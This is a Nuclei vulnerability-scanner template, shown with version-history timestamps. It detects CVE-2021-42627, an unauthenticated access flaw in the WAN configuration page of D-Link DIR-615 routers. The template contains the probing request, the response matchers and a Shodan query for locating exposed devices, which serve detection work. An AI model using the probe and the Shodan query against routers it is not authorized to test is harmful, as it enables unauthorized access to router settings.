nuclei-templates/cves/2021/CVE-2021-42627.yaml

39 lines
1.1 KiB
YAML
Raw Normal View History

2022-08-24 02:47:25 +00:00
id: CVE-2021-42627
info:
2022-08-24 03:19:11 +00:00
name: D-Link DIR-615 - Unauthorized Access
2022-08-24 02:47:25 +00:00
author: For3stCo1d
2022-08-24 03:19:11 +00:00
severity: high
2022-08-24 02:47:25 +00:00
description: |
The WAN configuration page "wan.htm" on D-Link DIR-615 devices with firmware 20.06 can be accessed directly without authentication which can lead to disclose the information about WAN settings and also leverage attacker to modify the data fields of page.
reference:
- https://github.com/sanjokkarki/D-Link-DIR-615/blob/main/CVE-2021-42627
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42627
- https://nvd.nist.gov/vuln/detail/CVE-2021-42627
metadata:
shodan-query: http.title:"Roteador Wireless"
verified: "true"
2022-08-24 03:19:11 +00:00
tags: cve,cve2021,d-link,router,unauth
2022-08-24 02:47:25 +00:00
requests:
- raw:
- |
GET /wan.htm HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "document.write(\"<s\"+\"cript type='text/javascript' src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");"
2022-08-24 02:52:29 +00:00
2022-08-24 02:47:25 +00:00
- type: word
part: header
words:
- Virtual Web
- type: status
status:
- 200